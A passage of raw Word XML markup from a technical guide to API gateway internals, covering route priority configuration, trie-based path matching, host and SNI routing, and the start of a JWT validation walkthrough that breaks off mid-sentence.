    <w:p w14:paraId="7E50B47F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      - host: payment-service-v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79296777" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">        port: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44733FD5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    priority: 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1464B51C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="7684A7C5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  - name: payment-api-v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A251E09" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    match:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE27A5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      hosts: ["api.example.com"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D43BFC2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      paths: ["/v1/payments/*", "/payments/*"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B202EA6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      methods: ["POST", "PUT", "GET"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAA607C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    backends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F444825" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      - host: payment-service-v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199077C7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">        port: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564FD9F2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    priority: 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068EBC9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="642A53CF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  - name: catch-all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DE2B94" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    match:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A9E83" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      hosts: ["api.example.com"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DFE7F2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      paths: ["/*"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D21F62" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    backends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0ABEBA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      - host: default-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A43D463" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">        port: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7737CCAD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    priority: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B40C93" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Priority resolution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> When a request matches multiple routes, the highest-priority route wins. The matching algorithm must efficiently evaluate all route criteria and find the highest-priority match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40532377" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path Matching Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508471AF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exact matching:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> /v2/payments matches only /v2/payments — no substring or prefix matching. O(1) lookup via hash map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A1E2B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefix matching:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> /v2/payments/* matches /v2/payments/123, /v2/payments/456/confirm, etc. Implemented via trie (prefix tree) for O(L) matching where L is the path length.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13341810" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Regex matching:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> /v[0-9]/payments/[a-zA-Z0-9]+ — full regular expression matching. O(L×P) where P is pattern complexity. More flexible but significantly slower — DFA (Deterministic Finite Automaton) compilation makes regex matching O(L) after initial compilation, but compilation itself is expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508BD961" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The trie-based router (Radix tree):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201F4797" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Production gateways use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>compressed radix trie</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> (also called a Patricia trie or radix tree) for path matching. Each node represents a path segment or character sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0A2E2A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0099F7F3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC9CDF7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve"> /v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF4869" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">│   </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve"> /payments </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve"> [payment-v1 route]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B9B4A8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">│   │   </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve"> /: </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve"> wildcard parameter capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46545E52" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>│   └── /users → [user-v1 route]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3444F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve"> /v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51506057" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">│   </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve"> /payments </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve"> [payment-v2 route]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138CDB0D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>│   └── /users → [user-v2 route]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBC355A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>└── / → [catch-all route]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585776F0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wildcard parameters in path matching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7ACCB3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Routes like /payments/:id/confirm capture path segments as named parameters. The :id segment matches any non-slash sequence and captures it as params.id. The gateway extracts these captures and makes them available to plugins (authentication policies can use the captured resource ID, backends receive them as path parameters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BBE01" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conflicting route resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3584F113" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>When routes overlap (e.g., /payments/refund matches both /payments/:id and /payments/refund), the gateway applies a specificity ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48212F08" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="851"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Exact matches beat prefix matches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C162A89" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="851"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Prefix matches beat wildcard matches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396AA170" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="851"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Longer prefixes beat shorter prefixes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC00D18" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="851"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Among equal-specificity matches, highest priority wins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C32F87" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>This ordering must be deterministic — ambiguous routing causes non-reproducible bugs that are extremely difficult to debug in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0337C5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host-Based Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097F3F5C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway matches the HTTP Host header (or TLS SNI for pre-TLS routing decisions) to determine which virtual host's routes apply:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AE6823" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADDFE00" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>api.example.com/v1/payments → Payment Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166266F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>admin.example.com/users → Admin Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DD4167" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>webhooks.example.com/stripe → Webhook Handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122AE0F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wildcard host matching:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> *.example.com matches all subdomains. Used for multi-tenant SaaS where each tenant has a subdomain (tenant1.example.com, tenant2.example.com) and the gateway routes based on the subdomain to the appropriate tenant's configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C64A4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The SNI-based pre-routing decision:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> For HTTPS traffic, TLS SNI (Server Name Indication — the hostname in the ClientHello) is available before TLS termination completes. The gateway can make routing decisions based on SNI before decryption — routing different domains to different TLS certificate stores or different backend clusters. This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pass-through TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> (the gateway doesn't decrypt, just routes based on SNI) for backends that handle their own TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712DD6B2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="33E6B1DA">
          <v:rect id="_x0000_i3826" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="069252D1" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Authentication at the Gateway — Deep Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367FE1FC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JWT Validation — The Complete Internal Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D5404" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>JWT (JSON Web Token) validation is the most common authentication mechanism at the API gateway layer. The gateway validates the token so backends don't need to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115D04A2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JWT Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388772E6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4FB64D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>base64url(header).base64url(payload).base64url(signature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70116C28" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="676F1F9C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Header: {"alg": "RS256", "typ": "JWT", "kid": "key-id-123"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C7EDC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Payload: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B99EF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "sub": "user123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8D41C3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "iss": "https://auth.example.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C20AACF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "aud": ["api.example.com"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C45A04B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "exp": 1735689600,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36230F99" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "iat": 1735603200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A3CD1" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "scope": "read:orders write:payments",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9C0EC4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  "roles": ["customer", "premium"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF6453" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E885F0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Signature: RSA-SHA256(base64url(header) + "." + base64url(payload), private_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31673476" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The complete validation steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F545866" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1 — Extract the token:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> From Authorization: Bearer &lt;token&gt; header. The gateway strips the Bearer  prefix and base64url-decodes the three components. Malformed tokens (wrong number of parts, invalid base64) fail immediately with 401.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D03079" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2 — Read the header:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Extract alg (signing algorithm) and kid (key ID). The alg is critical — </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
